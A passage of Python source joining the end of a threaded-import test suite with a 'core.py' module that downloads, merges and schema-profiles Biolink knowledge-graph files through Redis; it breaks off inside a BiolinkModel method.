# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
for i in range(N):
t = threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
t.start()
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
def test_side_effect_import(self):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
@reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
core.py
|
import argparse
import glob
import os
import orjson as json
import ntpath
import pathlib
import queue
import redis
import requests
import shutil
import sys
import threading
import time
import yaml
import pickle
from bmt import Toolkit
from collections import defaultdict
from enum import Enum
from io import StringIO
from kgx.utils.kgx_utils import prepare_data_dict as kgx_merge_dict
from roger import ROGER_DATA_DIR
from roger.Config import get_default_config as get_config
from roger.roger_util import get_logger
from roger.components.data_conversion_utils import TypeConversionUtil
from redisgraph_bulk_loader.bulk_insert import bulk_insert
from roger.roger_db import RedisGraph
from string import Template
from urllib.request import urlretrieve
log = get_logger ()
config = get_config ()
class SchemaType(Enum):
""" High level semantic metatdata concepts.
Categories are classes in an ontological model like Biolink.
Predicates are links between nodes. """
CATEGORY = "category"
PREDICATE = "predicate"
class FileFormat(Enum):
""" File formats this module knows about. """
JSON = "json"
YAML = "yaml"
# @TODO move this to shared file between dug , roger etc...
class Util:
@staticmethod
def current_time_in_millis():
"""
Get current time in milliseconds.
Returns
-------
int
Time in milliseconds
"""
return int(round(time.time() * 1000))
""" A just do it approach to getting data. """
@staticmethod
def read_file(path):
""" Read a file.
:param path: Path to a file.
"""
text = None
with open(path, "r") as stream:
text = stream.read ()
return text
@staticmethod
def read_url(url):
""" Read data from a URL.
:param url: The URL to read. """
return requests.get (url).text
@staticmethod
def read_data(path):
""" Read data from a URL or File. HTTP(S) is the only supported protocol.
:param path: A URL or file path. """
text = None
if Util.is_web(path):
text = Util.read_url (path)
else:
text = Util.read_file (path)
return text
@staticmethod
def read_object(path, key=None):
""" Read on object from a path.
:param path: A URL or file path. Supports YAML and JSON depending on extension.
:param key: A configuration key. This is prepended to the path if present.
:raises ValueError: If the key is not in the configuration. """
if key is not None:
prefix = config[key]
path = f"{prefix}/{path}" if Util.is_web(prefix) \
else os.path.join (prefix, path)
obj = None
if path.endswith (".yaml") or path.endswith (".yml"):
obj = yaml.safe_load (Util.read_data (path))
elif path.endswith (".json"):
obj = json.loads (Util.read_data (path))
elif path.endswith(".pickle"):
with open(file=path, mode="rb") as stream:
obj = pickle.load(stream)
elif path.endswith(".jsonl"):
obj = Util.read_data(path)
return obj
@staticmethod
def is_web (uri):
""" The URI is a web URI (starts with http or https).
:param uri: A URI """
return uri.startswith("http://") or uri.startswith ("https://")
@staticmethod
def write_object (obj, path, key=None):
""" Write an object to a path. YAML and JSON supported based on extension.
:param obj: The object to write.
:param path: The path to write to.
:param key: The configuration key to prepend to the path.
"""
""" Prepend a prefix from the configuration file if a key is given. """
if key is not None:
prefix = config[key]
path = f"{prefix}/{path}" if Util.is_web(prefix) \
else os.path.join (prefix, path)
""" Ensure the directory to be written to exists. """
dirname = os.path.dirname (path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
""" Write the file in the specified format. """
if path.endswith (".yaml") or path.endswith (".yml"):
with open(path, 'w') as outfile:
yaml.dump (obj, outfile)
elif path.endswith (".json"):
with open (path, "w") as stream:
stream.write(str(json.dumps (obj).decode('utf-8')))
elif path.endswith(".pickle"):
with open (path, "wb") as stream:
pickle.dump(obj, file=stream)
elif path.endswith(".jsonl"):
with open (path, "w", encoding="utf-8") as stream:
stream.write(obj)
else:
""" Raise an exception if invalid. """
raise ValueError (f"Unrecognized extension: {path}")
@staticmethod
def kgx_path (name):
""" Form a KGX object path.
:path name: Name of the KGX object. """
return str(ROGER_DATA_DIR / "kgx" / name)
@staticmethod
def kgx_objects (format="json"):
""" A list of KGX objects. """
kgx_pattern = Util.kgx_path(f"**.{format}")
return sorted(glob.glob (kgx_pattern))
@staticmethod
def merge_path (name):
""" Form a merged KGX object path.
:path name: Name of the merged KGX object. """
return str(ROGER_DATA_DIR / 'merge' / name)
@staticmethod
def merged_objects ():
""" A list of merged KGX objects. """
merged_pattern = Util.merge_path("**.json")
return sorted(glob.glob (merged_pattern))
@staticmethod
def schema_path (name):
""" Path to a schema object.
:param name: Name of the object to get a path for. """
return str(ROGER_DATA_DIR / 'schema' / name)
@staticmethod
def bulk_path (name):
""" Path to a bulk load object.
:param name: Name of the object. """
return str(ROGER_DATA_DIR / 'bulk' / name)
@staticmethod
def metrics_path (name):
"""
Path to write metrics to
:param name:
:return:
"""
return str(ROGER_DATA_DIR / "metrics" / name)
@staticmethod
def dug_kgx_path(name):
return str(ROGER_DATA_DIR / "dug" / "kgx" / name)
@staticmethod
def dug_annotation_path(name):
return str(ROGER_DATA_DIR / "dug" / "annotations" / name)
@staticmethod
def dug_expanded_concepts_path(name):
return str(ROGER_DATA_DIR / 'dug' / 'expanded_concepts' / name)
@staticmethod
def dug_expanded_concept_objects():
file_pattern = Util.dug_expanded_concepts_path(os.path.join('*','expanded_concepts.pickle'))
return sorted(glob.glob(file_pattern))
@staticmethod
def dug_crawl_path(name):
return str(ROGER_DATA_DIR / 'dug' / 'crawl' / name)
@staticmethod
def dug_kgx_objects():
""" A list of dug KGX objects. """
dug_kgx_pattern = Util.dug_kgx_path("**.json")
return sorted(glob.glob(dug_kgx_pattern))
@staticmethod
def dug_concepts_objects():
""" A list of dug annotation Objects. """
concepts_file_path = Util.dug_annotation_path(os.path.join('*','concepts.pickle'))
return sorted(glob.glob(concepts_file_path))
@staticmethod
def dug_elements_objects():
""" A list of dug annotation Objects. """
concepts_file_path = Util.dug_annotation_path(os.path.join('*', 'elements.pickle'))
return sorted(glob.glob(concepts_file_path))
@staticmethod
def dug_input_files_path(name) -> pathlib.Path:
path = ROGER_DATA_DIR / "dug" / "input_files" / name
if not path.exists():
log.info(f"Input file path: {path} does not exist, creating")
path.mkdir(parents=True, exist_ok=True)
else:
log.info(f"Input file path: {path} already exists")
return path
@staticmethod
def mkdir(path, is_dir=False):
directory = os.path.dirname(path) if not is_dir else path
if not os.path.exists(directory):
os.makedirs(directory)
@staticmethod
def remove(path):
if os.path.exists(path):
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
@staticmethod
def clear_dir(path):
Util.remove(path)
Util.mkdir(path, is_dir=True)
@staticmethod
def dug_topmed_path(name):
""" Topmed source files"""
return Util.dug_input_files_path('topmed') / name
@staticmethod
def dug_topmed_objects():
topmed_file_pattern = str(Util.dug_topmed_path("topmed_*.csv"))
return sorted(glob.glob(topmed_file_pattern))
@staticmethod
def dug_nida_path(name):
""" NIDA source files"""
return Util.dug_input_files_path('nida') / name
@staticmethod
def dug_nida_objects():
nida_file_pattern = str(Util.dug_nida_path("NIDA-*.xml"))
return sorted(glob.glob(nida_file_pattern))
@staticmethod
def dug_dd_xml_path():
""" Topmed source files"""
return Util.dug_input_files_path('db_gap')
@staticmethod
def get_files_recursive(file_name_filter, current_dir):
file_paths = []
for child in current_dir.iterdir():
if child.is_dir():
file_paths += Util.get_files_recursive(file_name_filter, child)
continue
if not file_name_filter(child.name):
continue
else:
file_paths += [child]
return file_paths
@staticmethod
def dug_dd_xml_objects():
file_path = Util.dug_dd_xml_path()
files = Util.get_files_recursive(lambda file_name: not file_name.startswith('._') and file_name.endswith('.xml'), file_path)
return sorted([str(f) for f in files])
@staticmethod
def copy_file_to_dir(file_location, dir_name):
return shutil.copy(file_location, dir_name)
@staticmethod
def read_schema (schema_type: SchemaType):
""" Read a schema object.
:param schema_type: Schema type of the object to read. """
path = Util.schema_path (f"{schema_type.value}-schema.json")
return Util.read_object (path)
@staticmethod
def get_uri (path, key):
""" Build a URI.
:param path: The path of an object.
:param key: The key of a configuration value to prepend to the object. """
# Incase config has http://..../ or http://... remove / and add back to
# avoid double http://...//
root_url = config[key].rstrip('/')
return f"{root_url}/{path}"
@staticmethod
def get_relative_path (path):
return os.path.join (os.path.dirname (__file__), path)
@staticmethod
def read_relative_object (path):
return Util.read_object (Util.get_relative_path(path))
@staticmethod
def trunc(text, limit):
return ('..' + text[-limit-2:]) if len(text) > limit else text
@staticmethod
def is_up_to_date (source, targets):
target_time_list = [ os.stat (f).st_mtime for f in targets if os.path.exists(f) ]
if len(target_time_list) == 0:
log.debug (f"no targets found")
return False
source = [ os.stat (f).st_mtime for f in source if os.path.exists (f) ]
if len(source) == 0:
log.debug ("no source found. up to date")
return True
return max(source) < min(target_time_list)
@staticmethod
def json_line_iter(jsonl_file_path):
f = open(file=jsonl_file_path, mode='r', encoding='utf-8')
for line in f:
yield json.loads(line)
f.close()
@staticmethod
def downloadfile(thread_num, inputq, doneq):
url = ""
t0 = 0
pct = 0
def downloadprogress(blocknumber, readsize, totalfilesize):
nonlocal thread_num
nonlocal url, t0, pct
blocks_expected = int(totalfilesize/readsize) + (1 if totalfilesize%readsize != 0 else 0)
t1 = int(Util.current_time_in_millis()/1000)
elapsed_delta = t1 - t0
pct = int(100 * blocknumber / blocks_expected)
if elapsed_delta >= 30: # every n seconds
log.info(f"thread-{thread_num} {pct}% of size:{totalfilesize} ({blocknumber}/{blocks_expected}) url:{url}")
t0 = t1
num_files_processed = 0
while inputq.empty() is False:
t0 = int(Util.current_time_in_millis()/1000)
url, dst = inputq.get()
num_files_processed += 1
log.info(f"thread-{thread_num} downloading {url}")
try:
path, httpMessage = urlretrieve(url, dst, reporthook=downloadprogress)
if pct < 100:
httpMessageKeys = httpMessage.keys()
log.info(f"thread-{thread_num} urlretrieve path:'{path}' http-keys:{httpMessageKeys} httpMessage:'{httpMessage.as_string()}")
except Exception as e:
log.error(f"thread-{thread_num} downloadfile excepton: {e}")
continue
log.info(f"thread-{thread_num} downloaded {dst}")
doneq.put((thread_num,num_files_processed))
log.info(f"thread-{thread_num} done!")
return
class KGXModel:
""" Abstractions for transforming Knowledge Graph Exchange formatted data. """
def __init__(self, biolink=None, config=None):
if not config:
config = get_config()
self.config = config
self.biolink_version = self.config.kgx.biolink_model_version
log.debug(f"Trying to get biolink version : {self.biolink_version}")
if biolink == None:
self.biolink = BiolinkModel(self.biolink_version)
else:
self.biolink = biolink
self.redis_conn = redis.Redis(
host=self.config.redisgraph.host,
port=self.config.redisgraph.port,
password=self.config.redisgraph.password,
db=1) # uses db1 for isolation @TODO make this config param.
self.enable_metrics = self.config.get('enable_metrics', False)
def get_kgx_json_format(self, files: list, dataset_version: str):
"""
Gets Json formatted kgx files. These files have a the following structure:
{"nodes": [{"id":"..."},...], "edges": [{"id":...},...}] }
Parameters
----------
files : list of file names
dataset_version : dataset version from dataset meta-data information
Returns None
-------
"""
file_tuple_q = queue.Queue()
thread_done_q = queue.Queue()
for nfile, file_name in enumerate(files):
# file_url or skip
file_name = dataset_version + "/" + file_name
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
log.debug ("#{}/{} to get: {}".format(nfile+1, len(files), file_url))
# folder
dirname = os.path.dirname (subgraph_path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
# add to queue
file_tuple_q.put((file_url,subgraph_path))
# start threads for each file download
threads = []
for thread_num in range(len(files)): # len(files)
th = threading.Thread(target=Util.downloadfile, args=(thread_num, file_tuple_q, thread_done_q))
th.start()
threads.append(th)
# wait for each thread to complete
for nwait in range(len(threads)):
thread_num, num_files_processed = thread_done_q.get()
th = threads[thread_num]
th.join()
log.info(f"#{nwait+1}/{len(threads)} joined: thread-{thread_num} processed: {num_files_processed} file(s)")
all_kgx_files = []
for nfile, file_name in enumerate(files):
start = Util.current_time_in_millis()
file_name = dataset_version + "/" + file_name
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
all_kgx_files.append(subgraph_path)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
log.info ("#{}/{} read: {}".format(nfile+1, len(files), file_url))
subgraph = Util.read_object(file_url)
Util.write_object(subgraph, subgraph_path)
total_time = Util.current_time_in_millis() - start
edges = len(subgraph['edges'])
nodes = len(subgraph['nodes'])
log.info("#{}/{} edges:{:>7} nodes: {:>7} time:{:>8} wrote: {}".format(
nfile+1, len(files), edges, nodes, total_time/1000, subgraph_path))
return all_kgx_files
def get_kgx_jsonl_format(self, files, dataset_version):
"""
gets pairs of jsonl formatted kgx files. Files is expected to have
all the pairs. I.e if kgx_1_nodes.jsonl exists its expected that kgx_1_edges.jsonl
exists in the same path.
File names should have strings *nodes*.jsonl and *edges*.jsonl.
Parameters
----------
files
dataset_version
Returns
-------
"""
# make a paired list
paired_up = []
log.info(f"getting {files}")
for file_name in files:
if "nodes" in file_name:
paired_up.append([file_name, file_name.replace('nodes', 'edges')])
error = False
# validate that all pairs exist
if len(files) / 2 != len(paired_up):
log.error("Error paired up kgx jsonl files don't match list of files specified in metadata.yaml")
error = True
for pairs in paired_up:
if pairs[0] not in files:
log.error(f"{pairs[0]} not in original list of files from metadata.yaml")
error = True
if pairs[1] not in files:
error = True
log.error(f"{pairs[1]} not in original list of files from metadata.yaml")
if error:
raise Exception("Metadata.yaml has inconsistent jsonl files")
file_tuple_q = queue.Queue()
thread_done_q = queue.Queue()
for npairs, pairs in enumerate(paired_up):
for npair, p in enumerate(pairs):
file_name = dataset_version + "/" + p
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
if os.path.exists(subgraph_path):
log.info(f"skip cached kgx: {subgraph_path}")
continue
log.info ("#{}.{}/{} read: {}".format(npairs+1, npair+1, len(paired_up), file_url))
# folder
dirname = os.path.dirname (subgraph_path)
if not os.path.exists (dirname):
os.makedirs (dirname, exist_ok=True)
# add to queue
file_tuple_q.put((file_url,subgraph_path))
# start threads for each file download
threads = []
for thread_num in range(file_tuple_q.qsize()):
th = threading.Thread(target=Util.downloadfile, args=(thread_num, file_tuple_q, thread_done_q))
th.start()
threads.append(th)
# wait for each thread to complete
for nwait in range(len(threads)):
thread_num, num_files_processed = thread_done_q.get()
th = threads[thread_num]
th.join()
log.info(f"#{nwait+1}/{len(threads)} joined: thread-{thread_num} processed: {num_files_processed} file(s)")
all_kgx_files = []
for pairs in paired_up:
nodes = 0
edges = 0
start = Util.current_time_in_millis()
for p in pairs:
file_name = dataset_version + "/" + p
file_url = Util.get_uri(file_name, "kgx_base_data_uri")
subgraph_basename = os.path.basename(file_name)
subgraph_path = Util.kgx_path(subgraph_basename)
all_kgx_files.append(subgraph_path)
if os.path.exists(subgraph_path):
log.info(f"cached kgx: {subgraph_path}")
continue
data = Util.read_object(file_url)
Util.write_object(data, subgraph_path)
if "edges" in p:
edges = len(data.split('\n'))
else:
nodes = len(data.split('\n'))
total_time = Util.current_time_in_millis() - start
log.info("wrote {:>45}: edges:{:>7} nodes: {:>7} time:{:>8}".format(
Util.trunc(subgraph_path, 45), edges, nodes, total_time))
return all_kgx_files
def get (self, dataset_version = "v1.0"):
""" Read metadata for KGX files and downloads them locally.
:param dataset_version: Data version to operate on.
"""
metadata = Util.read_relative_object ("../metadata.yaml")
data_set_list = self.config.kgx.data_sets
for item in metadata['kgx']['versions']:
if item['version'] == dataset_version and item['name'] in data_set_list:
log.info(f"Getting KGX dataset {item['name']} , version {item['version']}")
if item['format'] == 'json':
kgx_files_remote = self.get_kgx_json_format(item['files'], item['version'])
elif item['format'] == 'jsonl':
kgx_files_remote = self.get_kgx_jsonl_format(item['files'], item['version'])
else:
raise ValueError(f"Unrecognized format in metadata.yaml: {item['format']}, valid formats are `json` "
f"and `jsonl`.")
# Fetchs kgx generated from Dug Annotation workflow.
new_files = self.fetch_dug_kgx() + kgx_files_remote
all_files_in_dir = Util.kgx_objects(format="json") + Util.kgx_objects(format="jsonl")
files_to_remove = [x for x in all_files_in_dir if x not in new_files]
if len(files_to_remove):
log.info(f"Found some old files to remove from kgx dir : {files_to_remove}")
for file in files_to_remove:
Util.remove(file)
log.info(f"removed {file}")
log.info("Done.")
def fetch_dug_kgx(self):
"""
Copies files from dug output dir to roger kgx dir.
:return:
"""
dug_kgx_files = Util.dug_kgx_objects()
all_kgx_files = []
log.info(f"Copying dug KGX files to {Util.kgx_path('')}. Found {len(dug_kgx_files)} kgx files to copy.")
for file in dug_kgx_files:
file_name = ntpath.basename(file)
dest = Util.kgx_path(file_name)
all_kgx_files.append(dest)
Util.write_object({}, dest)
log.info(f"Copying from {file} to {dest}.")
Util.copy_file_to_dir(file, dest)
log.info("Done copying dug KGX files.")
return all_kgx_files
def create_nodes_schema(self):
"""
Extracts schema for nodes based on biolink leaf types
:return:
"""
category_schemas = defaultdict(lambda: None)
category_error_nodes = set()
merged_nodes_file = Util.merge_path("nodes.jsonl")
log.info(f"Processing : {merged_nodes_file}")
for node in Util.json_line_iter(merged_nodes_file):
if not node['category']:
category_error_nodes.add(node['id'])
node['category'] = [BiolinkModel.root_type]
node_type = self.biolink.get_leaf_class(node['category'])
category_schemas[node_type] = category_schemas.get(node_type, {})
for k in node.keys():
current_type = type(node[k]).__name__
if k not in category_schemas[node_type]:
category_schemas[node_type][k] = current_type
else:
previous_type = category_schemas[node_type][k]
category_schemas[node_type][k] = TypeConversionUtil.compare_types(previous_type, current_type)
if len(category_error_nodes):
log.warn(f"some nodes didn't have category assigned. KGX file has errors."
f"Nodes {len(category_error_nodes)}."
f"Showing first 10: {list(category_error_nodes)[:10]}."
f"These will be treated as {BiolinkModel.root_type}.")
""" Write node schemas. """
self.write_schema(category_schemas, SchemaType.CATEGORY)
def create_edges_schema(self):
"""
Create unified schema for all edges in an edges jsonl file.
:return:
"""
predicate_schemas = defaultdict(lambda: None)
merged_edges_file = Util.merge_path("edges.jsonl")
""" Infer predicate schemas. """
for edge in Util.json_line_iter(merged_edges_file):
predicate = edge['predicate']
predicate_schemas[predicate] = predicate_schemas.get(predicate, {})
for k in edge.keys():
current_type = type(edge[k]).__name__
if k not in predicate_schemas[predicate]:
predicate_schemas[predicate][k] = current_type
else:
previous_type = predicate_schemas[predicate][k]
predicate_schemas[predicate][k] = TypeConversionUtil.compare_types(previous_type, current_type)
self.write_schema(predicate_schemas, SchemaType.PREDICATE)
def create_schema (self):
"""
Determine the schema of each type of object. We have to do this to make it possible
to write tabular data. Need to know all possible columns in advance and correct missing
fields.
"""
if self.schema_up_to_date():
log.info (f"schema is up to date.")
return
self.create_nodes_schema()
self.create_edges_schema()
def schema_up_to_date (self):
return Util.is_up_to_date (
source=Util.kgx_objects (),
targets=[
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json"),
Util.schema_path (f"{SchemaType.PREDICATE.value}-schema.json")
])
def write_schema (self, schema, schema_type: SchemaType):
""" Output the schema file.
:param schema: Schema to get keys from.
:param schema_type: Type of schema to write. """
file_name = Util.schema_path (f"{schema_type.value}-schema.json")
log.info (f"writing schema: {file_name}")
dictionary = { k : v for k, v in schema.items () }
Util.write_object (dictionary, file_name)
def read_items_from_redis(self, ids):
chunk_size = 10_000 # batch for pipeline
pipeline = self.redis_conn.pipeline()
response = {}
chunked_ids = [ids[start: start + chunk_size] for start in range(0, len(ids), chunk_size)]
for ids in chunked_ids:
for i in ids:
pipeline.get(i)
result = pipeline.execute()
for i, res in zip(ids, result):
if res:
response.update({i: json.loads(res)})
return response
def write_items_to_redis(self, items):
chunk_size = 10_000 # batch for redis beyond this cap it might not be optimal, according to redis docs
pipeline = self.redis_conn.pipeline()
all_keys = list(items.keys())
chunked_keys = [all_keys[start: start + chunk_size] for start in range(0, len(all_keys), chunk_size)]
for keys in chunked_keys:
for key in keys:
pipeline.set(key, json.dumps(items[key]))
pipeline.execute()
def delete_keys(self, items):
# deletes keys
chunk_size = 10_000
pipeline = self.redis_conn.pipeline()
all_keys = list(items)
chunked_keys = [all_keys[start: start + chunk_size] for start in range(0, len(all_keys), chunk_size)]
for keys in chunked_keys:
for key in keys:
pipeline.delete(key)
pipeline.execute()
def delete_all_keys(self):
all_keys = self.redis_conn.keys("*")
log.info(f"found {len(all_keys)} to delete.")
self.delete_keys(all_keys)
log.info(f"deleted keys.")
def write_redis_back_to_jsonl(self, file_name, redis_key_pattern):
Util.mkdir(file_name)
with open(file_name, 'w', encoding='utf-8') as f:
start = time.time()
keys = self.redis_conn.keys(redis_key_pattern)
log.info(f"Grabbing {redis_key_pattern} from redis too {time.time() - start}")
chunk_size = 500_000
chunked_keys = [keys[start: start + chunk_size] for start in range(0, len(keys), chunk_size) ]
for chunk in chunked_keys:
items = self.read_items_from_redis(chunk)
self.delete_keys(chunk)
# transform them into lines
items = [json.dumps(items[x]).decode('utf-8') + '\n' for x in items]
f.writelines(items)
log.info(f"wrote : {len(items)}")
def kgx_merge_dict(self, dict_1, dict_2):
# collect values that are same first
merged = {}
# if properties match up with value treat as one
# get dict_1 intersection dict_2 ,
merged = {x: dict_1[x] for x in dict_1 if dict_1.get(x) == dict_2.get(x)}
# get dict_1 disjoint dict 2
unique_dict_1_props = {x: dict_1[x] for x in dict_1 if x not in merged.keys()}
# get dict_2 disjoint dict 1
unique_dict_2_props = {x: dict_2[x] for x in dict_2 if x not in merged.keys()}
merged.update(kgx_merge_dict(unique_dict_1_props, unique_dict_2_props))
for keys in merged:
attribute = merged[keys]
# When mergeing array's for bulk loading
# we have to make sure that items in lists
# don't contain single-quotes.
# Single quotes in array items break parsing of arrays on bulk loading
# downstream.
if isinstance(attribute, list):
new_attribute = []
for value in attribute:
if isinstance(value, str):
value = value.replace("'", '`')
new_attribute.append(value)
attribute = new_attribute
merged[keys] = attribute
return merged
def sort_node_types(self, node_dict):
categories = node_dict.get('category')
if not categories:
return node_dict
leaf_type = self.biolink.get_leaf_class(categories)
# brings leaf class in the top
categories = [leaf_type] + [x for x in categories if x != leaf_type]
node_dict['category'] = categories
return node_dict
def merge_node_and_edges (self, nodes, edges, current_metric , data_set_name ):
read_time = current_metric['read_kgx_file_time']
total_time = current_metric['total_processing_time']
# prefix keys for fetching back and writing to file.
nodes = {f"node-{node['id']}": self.sort_node_types(node) for node in nodes}
edges = {f"edge-{edge['subject']}-{edge['object']}-{edge['predicate']}": edge for edge in
edges}
read_from_redis_time = time.time()
# read nodes and edges scoped to current file
nodes_in_redis = self.read_items_from_redis(list(nodes.keys()))
edges_in_redis = self.read_items_from_redis(list(edges.keys()))
read_from_redis_time = time.time() - read_from_redis_time
current_metric['read_redis_time'] = read_from_redis_time
merge_time = time.time()
log.info(f"Found matching {len(nodes_in_redis)} nodes {len(edges_in_redis)} edges from redis...")
for node_id in nodes_in_redis:
nodes[node_id] = self.kgx_merge_dict(nodes[node_id], nodes_in_redis[node_id])
for edge_id in edges_in_redis:
edges[edge_id] = self.kgx_merge_dict(edges[edge_id], edges_in_redis[edge_id])
# add predicate labels to edges;
for edge_id in edges:
edges[edge_id]['predicate_label'] = self.biolink.get_label(edges[edge_id]['predicate'])
merge_time = time.time() - merge_time
current_metric['merge_time'] = merge_time
write_to_redis_time = time.time()
self.write_items_to_redis(nodes)
self.write_items_to_redis(edges)
write_to_redis_time = time.time() - write_to_redis_time
current_metric['write_to_redis_time'] = write_to_redis_time
log.debug(
"path {:>45} read_file:{:>5} read_nodes_from_redis:{:>7} merge_time:{:>3} write_nodes_to_redis: {"
":>3}".format(
Util.trunc(data_set_name, 45), read_time, read_from_redis_time, merge_time, write_to_redis_time))
total_file_processing_time = time.time() - total_time
current_metric['total_processing_time'] = total_file_processing_time
current_metric['total_nodes_in_kgx_file'] = len(nodes)
current_metric['total_edges_in_kgx_file'] = len(edges)
current_metric['nodes_found_in_redis'] = len(nodes_in_redis)
current_metric['edges_found_in_redis'] = len(edges_in_redis)
log.info(f"processing {data_set_name} took {total_file_processing_time}")
return current_metric
def merge (self):
""" Merge nodes. Would be good to have something less computationally intensive. """
data_set_version = self.config.get('kgx', {}).get('dataset_version')
metrics = {}
start = time.time()
json_format_files = Util.kgx_objects("json")
jsonl_format_files = set([
x.replace(f'nodes_{data_set_version}.jsonl', '').replace(f'edges_{data_set_version}.jsonl', '') for x in Util.kgx_objects("jsonl")
])
log.info("Deleting any redis merge keys from previous run....")
self.delete_all_keys()
for file in json_format_files:
current_metric = {}
total_time = read_time = time.time()
current_kgx_data = Util.read_object(file)
read_time = time.time() - read_time
current_metric['read_kgx_file_time'] = read_time
current_metric['total_processing_time'] = total_time
self.merge_node_and_edges(nodes=current_kgx_data['nodes'],
edges=current_kgx_data['edges'],
current_metric=current_metric,
data_set_name=file)
for file in jsonl_format_files:
current_metric = {}
total_time = read_time = time.time()
edges = Util.json_line_iter(Util.kgx_path(file + f'edges_{data_set_version}.jsonl'))
nodes = Util.json_line_iter(Util.kgx_path(file + f'nodes_{data_set_version}.jsonl'))
read_time = time.time() - read_time
current_metric['read_kgx_file_time'] = read_time
current_metric['total_processing_time'] = total_time
self.merge_node_and_edges(nodes=nodes,
edges=edges,
current_metric=current_metric,
data_set_name=file)
log.info(f"total time for dumping to redis : {time.time() - start}")
# now we have all nodes and edges merged in redis we scan the whole redis back to disk
write_merge_metric = {}
t = time.time()
log.info("getting all nodes")
start_nodes_jsonl = time.time()
nodes_file_path = Util.merge_path("nodes.jsonl")
self.write_redis_back_to_jsonl(nodes_file_path, "node-*")
log.info(f"writing nodes to took : {time.time() - start_nodes_jsonl}")
write_merge_metric['nodes_writing_time'] = time.time() - start_nodes_jsonl
start_edge_jsonl = time.time()
log.info("getting all edges")
edge_output_file_path = Util.merge_path("edges.jsonl")
self.write_redis_back_to_jsonl(edge_output_file_path, "edge-*")
write_merge_metric['edges_writing_time'] = time.time() - start_edge_jsonl
log.info(f"writing edges took: {time.time() - start_edge_jsonl}")
write_merge_metric['total_time'] = time.time() - t
metrics['write_jsonl'] = write_merge_metric
metrics['total_time'] = time.time() - start
log.info(f"total took: {time.time() - start}")
if self.enable_metrics:
path = Util.metrics_path('merge_metrics.yaml')
Util.write_object(metrics, path)
class BiolinkModel:
root_type = 'biolink:NamedThing'
def __init__(self, bl_version='1.5.0'):
self.bl_url = f'https://raw.githubusercontent.com/biolink/biolink-model/{bl_version}/biolink-model.yaml'
self.toolkit = Toolkit(self.bl_url)
def find_biolink_leaves(self, biolink_concepts):
"""
Given a list of biolink concepts, returns the leaves removing any parent concepts.
:param biolink_concepts: list of biolink concepts
:return: leave concepts.
"""
ancestry_set = set()
all_mixins_in_tree = set()
all_concepts = set(biolink_concepts)
